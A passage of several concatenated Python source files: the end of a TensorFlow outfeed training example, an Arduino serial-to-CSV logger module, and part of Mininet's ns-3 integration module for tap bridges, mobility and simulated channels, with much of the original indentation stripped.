tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(10, activation='softmax')
])
opt = tf.keras.optimizers.SGD(0.01)
# Create an iterator for the dataset.
train_iterator = iter(create_dataset())
# Function to continuously dequeue the outfeed until NUM_ITERATIONS examples
# are seen.
def dequeue_thread_fn():
counter = 0
while counter != NUM_ITERATIONS:
for loss in outfeed_queue:
print("Step", counter, "loss = ", loss.numpy())
counter += 1
# Start the dequeuing thread.
dequeue_thread = Thread(target=dequeue_thread_fn, args=[])
dequeue_thread.start()
# Run the custom training loop over the dataset.
strategy.run(training_step,
args=[NUM_ITERATIONS, train_iterator, model, opt])
dequeue_thread.join()
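# The pattern above - the compiled loop enqueues losses on the device while a
# host thread dequeues and prints them - mirrors an ordinary producer/consumer
# queue. The sketch below only illustrates that idea with a plain queue.Queue;
# it is not the IPU outfeed API and is not needed by the example.
def _producer_consumer_sketch(num_iterations=5):
    import queue
    import threading

    q = queue.Queue()

    def consumer():
        for step in range(num_iterations):
            loss = q.get()              # stands in for iterating outfeed_queue
            print("Step", step, "loss =", loss)

    t = threading.Thread(target=consumer)
    t.start()
    for step in range(num_iterations):
        q.put(float(step))              # stands in for outfeed_queue.enqueue(loss)
    t.join()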
|
ArduinoLogger.py
|
"""
____ ____ ____ _ ____ ____ __ __
| _ \ _ _ | _ \ / ___| | | ___ __ _ / ___|/ ___|\ \ / /
| |_) || | | || | | |\___ \ | | / _ \ / _` | _____ \___ \\___ \ \ \ / /
| __/ | |_| || |_| | ___) || || (_) || (_| | |_____| ___) |___) | \ V /
|_| \__, ||____/ |____/ |_| \___/ \__, | |____/|____/ \_/
|___/ |___/
"""
from PyDSlog.stream import ArduinoStream as stream # import Stream module
import threading
import time
import queue
import os
from datetime import datetime, timedelta
import sys
class Arduino_csv_saver:
def __init__(self, port, channels_to_use, frequency, block_size, filepath, filename=None, labeled=False, save_as_signal=False,
header=True, custom_header=None, add_tmp=None, date_format="%d/%m/%Y,%H:%M:%S", baudrate=115200, w_mode="a", delimiter=","):
self.generation_status = {0:"start", 1:"pause", 2:"stop", 3:"error"}
self.status = 1 # always the initial status
self.error_str = ""
self.run_label = "" # Set label to empty string. this are numbers that represent the machine state
self.values_count = 0
self.sem_1 = threading.Semaphore() # semaphore to safely read the mqtt global variables (run_label)
self.sem_2 = threading.Semaphore()
self.sem_3 = threading.Semaphore()
self.sem_4 = threading.Semaphore()
self.stream_thread_keepalive_flag = threading.Event() # this flag keeps thread_read_stream alive while it is set (it is cleared by stop())
self.start_flag = threading.Event() # this flag controls the generation of the csv file (set by start(), cleared by pause() and stop())
self.labeled = labeled
self.channels_to_use = channels_to_use # store the channels to use in a local variable.
self.frequency = frequency # store frequency in local variable
self.filename = filename # store the filename in a local variable
self.filepath = filepath # the filepath where the files are stored
self.date_format = date_format # the date-time format for the timestamp, only used in normal csv file
self.add_tmp = add_tmp # add timestamp as row in normal csv file?
self.header = header # add header flag for normal csv
self.custom_header = custom_header # add custom header in normal csv file
self.delimiter = delimiter # the delimiter between values
self.mode = w_mode # file open mode. "a" or "w"
self.block_size = block_size # the size of the block that is read at once from the stream
self.port = port # serial port
self.baudrate = baudrate # serial baudrate
self.save_as_signal = save_as_signal # save as signal or as normal csv file
self.stream_values = queue.Queue(0) # queue for storing the stream values. One thread puts values and the other reads them, so we don't block
self.serial_con = None # serial connection. None at the beginning
self.thread_read_stream = threading.Thread(target=self.thread_read_channels, args=()) # thread for reading the stream
if(save_as_signal): # if save_as_signal is true, then we define the threads for signal csv generation
self.thread_do_csv = threading.Thread(target=self.thread_do_csv_signal, args=())
else: # if not, then we define the threads for normal csv generation
self.thread_do_csv = threading.Thread(target=self.thread_do_csv_normal, args=())
def check_if_folder_exist_and_create(self): # function that checks if the path exists and, if not, creates it
if not os.path.exists(self.filepath): # create file folder if not exist
os.makedirs(self.filepath)
def generate_header(self): # function that generates the header of the csv file. Only used when "save_as_signal" is not True
header = ""
if(self.header == True):
if(self.custom_header is None):
if(self.add_tmp == "ms"):
header += "ms"+ self.delimiter
elif(self.add_tmp == "date"):
if(self.delimiter in self.date_format):
header += "date" + self.delimiter + "time" + self.delimiter
else:
header += "time" + self.delimiter
elif(self.add_tmp == "us"):
header += "us"+ self.delimiter
header += self.delimiter.join(self.channels_to_use)
if(self.labeled):
header += self.delimiter + "label" + "\n"
else:
header += "\n"
else:
header = self.custom_header + "\n"
return header
def format_csv(self, v): # Function that formats the csv file when "save_as_signal" is False.
period_block = float(self.block_size)/float(self.frequency)
period = float(1)/float(self.frequency) # period as inverse from the frequency
if(self.add_tmp == "ms"):
millis = int(round(time.time() * 1000)) # actual timestamp in milliseconds
period_ms = int(period * 1000) # period in milliseconds
elif(self.add_tmp == "us"):
micros = int(round(time.time() * 1000 * 1000)) # actual timestamp in microseconds
period_us = int(period * 1000 * 1000) # period in microseconds
elif(self.add_tmp == "date"):
now_datetime = datetime.now() # actual datetime
#millis = int(round(time.time() * 1000)) # actual timestamp in milliseconds. for adding to actual datetime
period_ms = int(period * 1000) # period in milliseconds
csv = "" # csv string that we write into file
if(self.add_tmp == "ms"): # check the selected timestamp type
for d in range(0, len(v)): # for d equal to 0 up to the number of rows
self.sem_1.acquire()
local_label = self.run_label # check the run_label
self.sem_1.release()
line = ""
row = v[d] # select row d
line += str(millis) + self.delimiter + self.delimiter.join(str(x) for x in row) # row to string with delimiter
millis = millis + period_ms # add "period_ms" to "millis" so the next row has the correct timestamp
if(self.labeled): # if "listen_mqtt_control" is True, then we append the "run_label" to the string
line += self.delimiter + local_label
csv += line + "\n"
elif(self.add_tmp == "us"):
for d in range(0, len(v)):
self.sem_1.acquire()
local_label = self.run_label
self.sem_1.release()
line = ""
row = v[d]
line += str(micros) + self.delimiter + self.delimiter.join(str(x) for x in row)
micros = micros + period_us
if(self.labeled):
line += self.delimiter + local_label
csv += line + "\n"
elif(self.add_tmp == "date"):
for d in range(0, len(v)):
self.sem_1.acquire()
local_label = self.run_label
self.sem_1.release()
line = ""
row = v[d]
now = now_datetime + timedelta(milliseconds=(period_ms*d))
date_time = now.strftime(self.date_format)
line += date_time + self.delimiter + self.delimiter.join(str(x) for x in row)
if(self.labeled):
line += self.delimiter + local_label
csv += line + "\n"
elif(self.add_tmp is None): # if "add_tmp" is None
for d in range(0, len(v)):
self.sem_1.acquire()
local_label = self.run_label
self.sem_1.release()
line = ""
row = v[d]
line += self.delimiter.join(str(x) for x in row)
if(self.labeled):
line += self.delimiter + local_label
csv += line + "\n"
return csv # return csv string
def thread_read_channels(self): # thread that reads the stream and puts the values in a queue
try:
s = stream.Arduino_stream(self.block_size, self.channels_to_use, self.frequency, self.port, self.baudrate)
s.connect()
self.start_flag.wait() # wait for "start_flag" to be set to start the stream
s.start()
stream_is_on = True # "stream_is_on" flag to True
while(self.stream_thread_keepalive_flag.is_set()): # while "stream_thread_keepalive_flag" is set, keep this thread alive
if(self.start_flag.is_set()): # if "start_flag" is set, then we read. If not, we are paused/stopped and do nothing
if(stream_is_on): # if stream is on we read
v = s.read(transpose=(not self.save_as_signal))
self.stream_values.put(v)
self.sem_3.acquire()
self.values_count += 1
self.sem_3.release()
else: # if stream is not on, then we start the stream
#s.connect()
s.start()
stream_is_on = True
else:
s.stop()
stream_is_on = False
if(stream_is_on):
s.stop()
s.disconnect()
stream_is_on = False
except Exception as err:
self.sem_2.acquire()
self.status = 3
self.sem_2.release()
self.sem_4.acquire()
self.error_str = str(err)
self.sem_4.release()
raise err
def thread_do_csv_normal(self): # thread that generates a normal labeled csv file.
self.check_if_folder_exist_and_create()
try:
if(self.filename == ""):
raise ValueError("no filename defined")
f = open(self.filepath + self.filename, self.mode) # open files
if(os.stat(self.filepath + self.filename).st_size == 0): # if file has nothing, then write header
header = self.generate_header()
f.write(header)
while(self.stream_thread_keepalive_flag.is_set()): # keep alive as long as "stream_thread_keepalive_flag" is set
if(self.stream_values.empty() == False): # if the "stream_values" is not empty
try:
v = self.stream_values.get(block=False) # read queue / non blocking
except queue.Empty:
pass
else:
csv = self.format_csv(v) # format stream values to csv string
f.write(csv) # write csv
f.close() # close file
except Exception as err:
self.sem_2.acquire()
self.status = 3
self.sem_2.release()
self.sem_4.acquire()
self.error_str = str(err)
self.sem_4.release()
raise err
def thread_do_csv_signal(self): # thread that generates a labeled signal csv file.
self.check_if_folder_exist_and_create()
try:
f_x = []
for c in (self.channels_to_use): # open file for every element in "channels_to_use"
f_x.append(open(self.filepath + "x_" + c + "_" + ".csv", self.mode))
if(self.labeled):
f_y = open(self.filepath + "y_" +".csv", self.mode) # open label file
while(self.stream_thread_keepalive_flag.is_set()): # keep alive as long as "stream_thread_keepalive_flag" is set
if(self.stream_values.empty() == False): # if the "stream_values" is not empty
try:
v = self.stream_values.get(block=False) # read queue / non blocking
except queue.Empty:
pass
else:
self.sem_1.acquire()
local_label = self.run_label # look for actual "run_label"
self.sem_1.release()
if(self.labeled):
f_y.write(str(local_label) + "\n") # write label in label file
for n in range(0, len(v)): # for every channel or dimension in the returned list
line = ""
row = v[n] # select one channel. --> (v is a n-dimensional-list with every dimension a channel) <--
line += self.delimiter.join(str(x) for x in row) # signal to string with delimiter
f_x[n].write(line + "\n") # write complete signal in row of the csv file
if(self.labeled):
f_y.close()
for f in f_x: # close files
f.close()
except Exception as err:
self.sem_2.acquire()
self.status = 3
self.sem_2.release()
self.sem_4.acquire()
self.error_str = str(err)
self.sem_4.release()
raise err
def get_status(self, status_text=True):
self.sem_1.acquire()
local_label = self.run_label
self.sem_1.release()
self.sem_2.acquire()
local_status = self.status
self.sem_2.release()
self.sem_3.acquire()
local_count = self.values_count
self.sem_3.release()
self.sem_4.acquire()
local_error = self.error_str
self.sem_4.release()
if(status_text):
status = self.generation_status[local_status]
else:
status = local_status
return {"label":local_label, "count":local_count, "status":status, "err_info": local_error}
def set_label(self, label):
self.sem_1.acquire()
self.run_label = label
self.sem_1.release()
def start(self): # function that starts the threads and sets the flags to start the generation of the csv file
self.sem_2.acquire()
self.status = 0
self.sem_2.release()
self.start_flag.set()
self.stream_thread_keepalive_flag.set()
if (not self.thread_read_stream.is_alive()):
self.thread_read_stream.start()
if (not self.thread_do_csv.is_alive()):
self.thread_do_csv.start()
def pause(self):
self.start_flag.clear()
self.sem_2.acquire()
self.status = 1
self.sem_2.release()
def stop(self):
self.start_flag.clear()
self.stream_thread_keepalive_flag.clear()
self.sem_2.acquire()
self.status = 2
self.sem_2.release()
self.thread_do_csv.join()
self.thread_read_stream.join()
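# A minimal, hypothetical usage sketch (not part of the original module). The
# serial port, channel names, file locations and label value below are
# assumptions chosen for illustration; adjust them to your own setup.
if __name__ == "__main__":
    saver = Arduino_csv_saver(port="/dev/ttyUSB0",
                              channels_to_use=["A0", "A1"],
                              frequency=100, block_size=50,
                              filepath="data/", filename="run1.csv",
                              labeled=True, add_tmp="ms")
    saver.set_label("1")       # label rows with the current machine state
    saver.start()              # start the stream thread and the csv thread
    time.sleep(5)              # record for a few seconds
    print(saver.get_status())  # {"label": ..., "count": ..., "status": ..., "err_info": ...}
    saver.stop()               # stop streaming and join the worker threads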
|
ns3.py
|
"""
From https://github.com/piotrjurkiewicz/mininet.git
Credit: Piotr Jurkiewicz
"""
"""
NS-3 integration for Mininet.
Mininet Mininet
node 1 node 2
+---------+ +---------+
| name | | name |
| space 1 | | space 2 |
| ------- | |---------|
| shell | | shell |
| ------- | |---------|
| Linux | | Linux |
| network | | network |
| stack | ns-3 ns-3 | stack |
| ------ | node 1 node 2 |---------|
| TAP | |===========| |===========| | TAP |
| intf. |<-fd->| TapBridge | | TapBridge |<-fd->| intf. |
+---------+ | --------- | | --------- | +---------+
| ns-3 | | ns-3 |
| net | | net |
| device | | device |
+-----------+ +-----------+
|| ||
+---------------------------+
| ns-3 channel |
+---------------------------+
|<------------------------------->|
ns-3 process
in the root namespace
"""
import threading, time, random
from mininet.log import info, error, warn, debug
from mininet.link import Intf, Link
from mininet.node import Switch, Node
from mininet.util import quietRun, moveIntf, errRun
import ns.core
import ns.network
import ns.tap_bridge
import ns.csma
import ns.wifi
import ns.mobility
# Default duration of ns-3 simulation thread. You can freely modify this value.
default_duration = 3600
# Set ns-3 simulator type to realtime simulator implementation.
# You can find more information about realtime modes here:
# http://www.nsnam.org/docs/release/3.17/manual/singlehtml/index.html#realtime
# http://www.nsnam.org/wiki/index.php/Emulation_and_Realtime_Scheduler
ns.core.GlobalValue.Bind( "SimulatorImplementationType", ns.core.StringValue( "ns3::RealtimeSimulatorImpl" ) )
# Enable checksum computation in ns-3 devices. By default ns-3 does not compute checksums - it is not needed
# when it runs in simulation mode. However, when it runs in emulation mode and exchanges packets with the real
# world, bit errors may occur in the real world, so we need to enable checksum computation.
ns.core.GlobalValue.Bind( "ChecksumEnabled", ns.core.BooleanValue ( "true" ) )
# Arrays which track all created TBIntf objects and Mininet nodes which has assigned an underlying ns-3 node.
allTBIntfs = []
allNodes = []
# These four global functions below are used to control ns-3 simulator thread. They are global, because
# ns-3 has one global singleton simulator object.
def start():
""" Start the simulator thread in background.
It should be called after configuration of all ns-3 objects
(TBintfs, Segments and Links).
Attempting to add an ns-3 object while the simulator thread is
running may result in a segfault. You should stop it first."""
global thread
if 'thread' in globals() and thread.is_alive():
warn( "NS-3 simulator thread already running." )
return
# Install all TapBridge ns-3 devices not installed yet.
for intf in allTBIntfs:
if not intf.nsInstalled:
intf.nsInstall()
# Set up the simulator thread.
thread = threading.Thread( target = runthread )
thread.daemon = True
# Start the simulator thread (this is where fork happens).
# FORK!
thread.start()
# FORK:PARENT
# Code below is executed in the parent thread.
# Move all tap interfaces not moved yet to the right namespace.
for intf in allTBIntfs:
if not intf.inRightNamespace:
intf.namespaceMove()
return
def runthread():
""" Method called in the simulator thread on its start.
Should not be called manually."""
# FORK:CHILD
# Code below is executed in the simulator thread after the fork.
# The stop event must be scheduled before the simulator starts. Not scheduling it
# may lead to a segfault.
ns.core.Simulator.Stop( ns.core.Seconds( default_duration ) )
# Start simulator. Function below blocks the Python thread and returns when simulator stops.
ns.core.Simulator.Run()
def stop():
""" Stop the simulator thread now."""
# Schedule a stop event.
ns.core.Simulator.Stop( ns.core.MilliSeconds( 1 ) )
# Wait until the simulator thread stops.
while thread.is_alive():
time.sleep( 0.01 )
return
def clear():
""" Clear ns-3 simulator.
It should be called when simulator is stopped."""
ns.core.Simulator.Destroy()
for intf in allTBIntfs:
intf.nsInstalled = False
#intf.delete()
for node in allNodes:
del node.nsNode
del allTBIntfs[:]
del allNodes[:]
return
def createAttributes( n0="", v0=ns.core.EmptyAttributeValue(),
n1="", v1=ns.core.EmptyAttributeValue(),
n2="", v2=ns.core.EmptyAttributeValue(),
n3="", v3=ns.core.EmptyAttributeValue(),
n4="", v4=ns.core.EmptyAttributeValue(),
n5="", v5=ns.core.EmptyAttributeValue(),
n6="", v6=ns.core.EmptyAttributeValue(),
n7="", v7=ns.core.EmptyAttributeValue()):
attrs = { 'n0' : n0, 'v0' : v0,
'n1' : n1, 'v1' : v1,
'n2' : n2, 'v2' : v2,
'n3' : n3, 'v3' : v3,
'n4' : n4, 'v4' : v4,
'n5' : n5, 'v5' : v5,
'n6' : n6, 'v6' : v6,
'n7' : n7, 'v7' : v7 }
return attrs
def setAttributes( func, typeStr, attrs):
a = { 'n0' : "", 'v0' : ns.core.EmptyAttributeValue(),
'n1' : "", 'v1' : ns.core.EmptyAttributeValue(),
'n2' : "", 'v2' : ns.core.EmptyAttributeValue(),
'n3' : "", 'v3' : ns.core.EmptyAttributeValue(),
'n4' : "", 'v4' : ns.core.EmptyAttributeValue(),
'n5' : "", 'v5' : ns.core.EmptyAttributeValue(),
'n6' : "", 'v6' : ns.core.EmptyAttributeValue(),
'n7' : "", 'v7' : ns.core.EmptyAttributeValue() }
a.update (attrs)
func (typeStr, a['n0'], a['v0'], a['n1'], a['v1'],
a['n2'], a['v2'], a['n3'], a['v3'],
a['n4'], a['v4'], a['n5'], a['v5'],
a['n6'], a['v6'], a['n7'], a['v7'])
def createMobilityHelper( mobilityType = "ns3::ConstantVelocityMobilityModel", **attrs):
mobHelper = ns.mobility.MobilityHelper()
setAttributes (mobHelper.SetMobilityModel, mobilityType, attrs)
return mobHelper
def setPositionAllocate( mobHelper, posAllocateType = "ns3::RandomDiscPositionAllocator", **attrs):
setAttributes (mobHelper.SetPositionAllocator, posAllocateType, attrs)
return mobHelper
def setListPositionAllocate( mobHelper, lpa):
mobHelper.SetPositionAllocator(lpa)
return mobHelper
def createListPositionAllocate(**attrs):
lpa = ns.mobility.ListPositionAllocator()
i = 1
while True:
if ('x' + str(i)) not in attrs and ('y' + str(i)) not in attrs and ('z' + str(i)) not in attrs:
break
x = attrs.get('x'+ str(i), 0)
y = attrs.get('y'+ str(i), 0)
z = attrs.get('z'+ str(i), 0)
lpa.Add(ns.core.Vector(x, y, z))
i = i+1
return lpa
def hasMobilityModel( node ):
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
pass
else:
node.nsNode = ns.network.Node()
allNodes.append( node )
try:
mm = node.nsNode.GetObject(ns.mobility.MobilityModel.GetTypeId())
return ( mm is not None )
except AttributeError:
warn("ns-3 mobility model not found\n")
return False
def getMobilityModel( node ):
''' Return the mobility model of a node
'''
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
pass
else:
node.nsNode = ns.network.Node()
allNodes.append( node )
try:
mm = node.nsNode.GetObject(ns.mobility.MobilityModel.GetTypeId())
return mm
except AttributeError:
warn("ns-3 mobility model not found\n")
return None
def setMobilityModel( node, mobHelper = None):
''' Set the mobility model of a node
'''
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
pass
else:
node.nsNode = ns.network.Node()
allNodes.append( node )
if mobHelper is None:
mobHelper = createMobilityHelper ()
mobHelper.Install (node.nsNode)
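# A minimal, hypothetical sketch combining the helpers above (not part of the
# original module): give two Mininet nodes fixed ns-3 positions through a
# ListPositionAllocator. The coordinates and the use of
# ns3::ConstantPositionMobilityModel are illustrative assumptions.
def exampleFixedPositions( node1, node2 ):
    lpa = createListPositionAllocate( x1=0.0, y1=0.0, z1=0.0,
                                      x2=10.0, y2=0.0, z2=0.0 )
    mobHelper = createMobilityHelper( "ns3::ConstantPositionMobilityModel" )
    setListPositionAllocate( mobHelper, lpa )
    # Each Install() call consumes the next position from the allocator.
    setMobilityModel( node1, mobHelper )
    setMobilityModel( node2, mobHelper )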
# Functions for manipulating nodes positions. Nodes positioning is useful in
# wireless channel simulations: distance between nodes affects received signal power
# and, thus, throughput.
# Node positions are stored in the underlying ns-3 node (not in Mininet node itself).
def getPosition( node ):
""" Return the ns-3 (x, y, z) position of a Mininet node.
Coordinates are in the 3D Cartesian system.
The unit is meters.
node: Mininet node"""
# Check if this Mininet node has assigned the underlying ns-3 node.
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
# If it is assigned, go ahead.
pass
else:
# If not, create new ns-3 node and assign it to this Mininet node.
node.nsNode = ns.network.Node()
allNodes.append( node )
try:
# Get position coordinates from the ns-3 node
mm = node.nsNode.GetObject( ns.mobility.MobilityModel.GetTypeId() )
pos = mm.GetPosition()
return ( pos.x, pos.y, pos.z )
except AttributeError:
warn( "ns-3 mobility model not found\n" )
return ( 0, 0, 0 )
def setPosition( node, x, y, z ):
""" Set the ns-3 (x, y, z) position of a Mininet node.
Coordinates are in the 3D Cartesian system.
The unit is meters.
node: Mininet node
x: integer or float x coordinate
y: integer or float y coordinate
z: integer or float z coordinate"""
# Check if this Mininet node has assigned the underlying ns-3 node.
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
# If it is assigned, go ahead.
pass
else:
# If not, create new ns-3 node and assign it to this Mininet node.
node.nsNode = ns.network.Node()
allNodes.append( node )
try:
mm = node.nsNode.GetObject( ns.mobility.MobilityModel.GetTypeId() )
if x is None:
x = 0.0
if y is None:
y = 0.0
if z is None:
z = 0.0
# Set position coordinates in the ns-3 node
pos = mm.SetPosition( ns.core.Vector( x, y, z ) )
except AttributeError:
warn( "ns-3 mobility model not found, not setting position\n" )
def getVelocity( node ):
''' Return the ns-3 (x, y, z) velocity of a node.
'''
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
pass
else:
node.nsNode = ns.network.Node()
allNodes.append( node )
try:
mm = node.nsNode.GetObject(ns.mobility.ConstantVelocityMobilityModel.GetTypeId())
vel = mm.GetVelocity()
return (vel.x, vel.y, vel.z)
except AttributeError:
warn("ns-3 constant velocity mobility model not found\n")
return (0,0,0)
def setVelocity( node, x = None, y = None, z = None ):
''' Set the ns-3 (x, y, z) velocity of a node.
'''
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
pass
else:
node.nsNode = ns.network.Node()
allNodes.append( node )
try:
mm = node.nsNode.GetObject(ns.mobility.ConstantVelocityMobilityModel.GetTypeId())
if x is None:
x = 0.0
if y is None:
y = 0.0
if z is None:
z = 0.0
vel = mm.SetVelocity(ns.core.Vector(x, y, z))
except AttributeError:
warn("ns-3 constant velocity mobility model not found, not setting position\n")
# TBIntf is the main workhorse of the module. TBIntf is a tap Linux interface located on Mininet
# node, which is bridged with ns-3 device located on ns-3 node.
class TBIntf( Intf ):
""" Interface object that is bridged with ns-3 emulated device.
This is a subclass of Mininet basic Inft object. """
def __init__( self, name, node, port=None,
nsNode=None, nsDevice=None, mode=None, **params ):
"""name: interface name (e.g. h1-eth0)
node: owning Mininet node (where this intf most likely lives)
link: parent link if we're part of a link #TODO
nsNode: underlying ns-3 node
nsDevice: ns-3 device which the tap interface is bridged with
mode: mode of TapBridge ns-3 device (UseLocal or UseBridge)
other arguments are passed to config()"""
self.name = name
# Create a tap interface in the system, ns-3 TapBridge will connect to that interface later.
self.createTap()
# Set this Intf to be delayed move. This tells Mininet not to move the interface to the right
# namespace during Intf.__init__(). Therefore, the interface must be moved manually later.
# Actually, interfaces are moved right after the simulator thread start, in the start() global
# function.
self.delayedMove = True
# If this node is running in its own namespace...
if node.inNamespace:
# ...this interface is not yet in the right namespace (it is in the root namespace just after
# creation) and should be moved later.
self.inRightNamespace = False
else:
# ...interface should stay in the root namespace, so it is in right namespace now.
self.inRightNamespace = True
# Initialize parent Intf object.
Intf.__init__( self, name, node, port , **params)
allTBIntfs.append( self )
self.nsNode = nsNode
self.nsDevice = nsDevice
self.mode = mode
self.params = params
self.nsInstalled = False
# Create TapBridge ns-3 device.
self.tapbridge = ns.tap_bridge.TapBridge()
# If ns-3 node and bridged ns-3 device are set and TapBridge mode is known...
if self.nsNode and self.nsDevice and ( self.mode or self.node ):
# ...call nsInstall().
self.nsInstall()
def createTap( self ):
"""Create tap Linux interface in the root namespace."""
quietRun( 'ip tuntap add ' + self.name + ' mode tap' )
def nsInstall( self ):
"""Install TapBridge ns-3 device in the ns-3 simulator."""
if not isinstance( self.nsNode, ns.network.Node ):
warn( "Cannot install TBIntf to ns-3 Node: "
"nsNode not specified\n" )
return
if not isinstance( self.nsDevice, ns.network.NetDevice ):
warn( "Cannot install TBIntf to ns-3 Node: "
"nsDevice not specified\n" )
return
# If TapBridge mode has not been set explicitly, determine it automatically based on
# the Mininet node type. You can find more about TapBridge modes here:
# http://www.nsnam.org/docs/release/3.18/models/singlehtml/index.html#tap-netdevice
if self.mode is None and self.node is not None:
# If Mininet node is some kind of Switch...
if isinstance( self.node, Switch ):
# ...use "UseBridge" mode. In this mode there may be many different L2 devices with
# many source addresses on the Linux side of TapBridge, but bridged ns-3 device must
# support SendFrom().
self.mode = "UseBridge"
else:
# ...in the other case use "UseLocal" mode. In this mode there may be only one L2 source device
# on the Linux side of TapBridge (TapBridge will change source MAC address of all packets coming
# from the tap interface to the discovered address of this interface). In this mode bridged ns-3
# device does not have to support SendFrom() (it uses Send() function to send packets).
self.mode = "UseLocal"
if self.mode is None:
warn( "Cannot install TBIntf to ns-3 Node: "
"cannot determine mode: neither mode nor (mininet) node specified\n" )
return
# Set all required TapBridge attributes.
self.tapbridge.SetAttribute ( "Mode", ns.core.StringValue( self.mode ) )
self.tapbridge.SetAttribute ( "DeviceName", ns.core.StringValue( self.name ) )
self.tapbridge.SetAttributeFailSafe ( "Instant", ns.core.BooleanValue( True ) ) # to be implemented in ns-3
# Add TapBridge device to the ns-3 node.
self.nsNode.AddDevice( self.tapbridge )
# Set this TapBridge to be bridged with the specified ns-3 device.
self.tapbridge.SetBridgedNetDevice( self.nsDevice )
# Installation is done.
self.nsInstalled = True
def namespaceMove( self ):
"""Move tap Linux interface to the right namespace."""
loops = 0
# Wait until ns-3 process connects to the tap Linux interface. ns-3 process resides in the root
# network namespace, so it must manage to connect to the interface before it is moved to the node
# namespace. After the interface is moved, the ns-3 process will no longer see it.
while not self.isConnected():
time.sleep( 0.01 )
loops += 1
if loops > 10:
warn( "Cannot move TBIntf to mininet Node namespace: "
"ns-3 has not connected yet to the TAP interface\n" )
return
# Wait a little longer, just to be sure the ns-3 process does not miss it.
time.sleep( 0.01 )
# Move interface to the right namespace.
moveIntf( self.name, self.node )
self.inRightNamespace = True
# IP address has been reset while moving to namespace, needs to be set again.
if self.ip is not None:
self.setIP( self.ip, self.prefixLen )
# The same for 'up'.
self.isUp( True )
def isConnected( self ):
"""Check if ns-3 TapBridge has connected to the Linux tap interface."""
return self.tapbridge.IsLinkUp()
def cmd( self, *args, **kwargs ):
"Run a command in our owning node namespace or in the root namespace when not yet inRightNamespace."
if self.inRightNamespace:
return self.node.cmd( *args, **kwargs )
else:
cmd = ' '.join( [ str( c ) for c in args ] )
return errRun( cmd )[ 0 ]
def rename( self, newname ):
"Rename interface"
# If TapBridge is installed in ns-3, but ns-3 has not connected to the Linux tap interface yet...
if self.nsInstalled and not self.isConnected():
# ...change device name in TapBridge to the new one.
self.tapbridge.SetAttribute ( "DeviceName", ns.core.StringValue( newname ) )
Intf.rename( self, newname )
def delete( self ):
"Delete interface"
if self.nsInstalled:
warn( "You can not delete once installed ns-3 device, "
"run mininet.ns3.clear() to delete all ns-3 devices\n" )
else:
Intf.delete( self )
# A network segment is a Mininet object consisting of an ns-3 channel of a specific type. This can be seen as
# an equivalent of a collision domain. Many Mininet nodes can be connected to one network segment.
# During connecting, Mininet creates an ns-3 device of a particular type in the underlying ns-3 node.
# Then it connects this ns-3 device to the segment's ns-3 channel. Next, Mininet creates a TBIntf in the
# specified Mininet node and bridges this tap interface with the ns-3 device created previously.
# A network link is a subclass of a network segment. It is a network segment with only two nodes connected.
# Moreover, a network link is a subclass of the Mininet Link. This means that you can use it like a standard
# Mininet Link and interchangeably with it: it supports all methods of its superclass and the constructor
# argument order is the same.
# SimpleChannel is the simplest channel model available in ns-3. Many devices can be connected to it
# simultaneously. Devices support SendFrom(), therefore they can be used in "UseBridge" mode (for example
# for connecting switches). There is no channel blocking implemented - many devices can transmit
# simultaneously. Data rate and channel delay cannot be set. However, one can
# set the receiver error model in SimpleNetDevice to simulate packet loss. You can find more information
# about the SimpleChannel in its source code and here:
# http://www.nsnam.org/docs/doxygen/classns3_1_1_simple_channel.html
class SimpleSegment( object ):
"""The simplest channel model available in ns-3.
SimpleNetDevice supports SendFrom()."""
def __init__( self ):
self.channel = ns.network.SimpleChannel()
def add( self, node, port=None, intfName=None, mode=None ):
"""Connect Mininet node to the segment.
node: Mininet node
port: node port number (optional)
intfName: node tap interface name (optional)
mode: TapBridge mode (UseLocal or UseBridge) (optional)"""
# Check if this Mininet node has assigned an underlying ns-3 node.
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
# If it is assigned, go ahead.
pass
else:
# If not, create new ns-3 node and assign it to this Mininet node.
node.nsNode = ns.network.Node()
allNodes.append( node )
# Create ns-3 device.
device = ns.network.SimpleNetDevice()
device.SetAddress (ns.network.Mac48Address.Allocate ())
# Connect this device to the segment's channel.
device.SetChannel(self.channel)
# Add this device to the ns-3 node.
node.nsNode.AddDevice(device)
# If port number is not specified...
if port is None:
# ...obtain it automatically.
port = node.newPort()
# If interface name is not specified...
if intfName is None:
# ...obtain it automatically.
intfName = node.name + '-eth' + repr( port )
# In the specified Mininet node, create TBIntf bridged with the 'device'.
tb = TBIntf( intfName, node, port, node.nsNode, device, mode )
return tb
class SimpleLink( SimpleSegment, Link ):
"""Link between two nodes using the SimpleChannel ns-3 model"""
def __init__( self, node1, node2, port1=None, port2=None,
intfName1=None, intfName2=None ):
"""Create simple link to another node, making two new tap interfaces.
node1: first Mininet node
node2: second Mininet node
port1: node1 port number (optional)
port2: node2 port number (optional)
intfName1: node1 interface name (optional)
intfName2: node2 interface name (optional)"""
SimpleSegment.__init__( self )
intf1 = SimpleSegment.add( self, node1, port1, intfName1 )
intf2 = SimpleSegment.add( self, node2, port2, intfName2 )
intf1.link = self
intf2.link = self
self.intf1, self.intf2 = intf1, intf2
# CsmaChannel is a more advanced model, built up upon SimpleChannel model. CsmaChannel is an equivalent
# of Ethernet channel, with CSMA blocking during transmission. Moreover, data rate and channel delay can
# be set (notice: setting a high delay can result in a low data rate, as the channel is considered blocked for the
# transmission of the next packet for the delay interval after transmission start).
# You can find more information about CsmaChannel and CsmaNetDevice here:
# http://www.nsnam.org/docs/release/3.18/models/singlehtml/index.html#document-csma
class CSMASegment( object ):
"""Equivalent of the Ethernet channel
CsmaNetDevice supports SendFrom()"""
def __init__( self, DataRate=None, Delay=None ):
"""DataRate: forced data rate of connected devices (optional), for example: 10Mbps, default: no-limit
Delay: channel transmission delay (optional), for example: 10ns, default: 0"""
self.channel = ns.csma.CsmaChannel()
if DataRate is not None:
self.channel.SetAttribute( "DataRate", ns.network.DataRateValue( ns.network.DataRate( DataRate ) ) )
if Delay is not None:
self.channel.SetAttribute( "Delay", ns.core.TimeValue( ns.core.Time( Delay ) ) )
def add( self, node, port=None, intfName=None, mode=None ):
"""Connect Mininet node to the segment.
node: Mininet node
port: node port number (optional)
intfName: node tap interface name (optional)
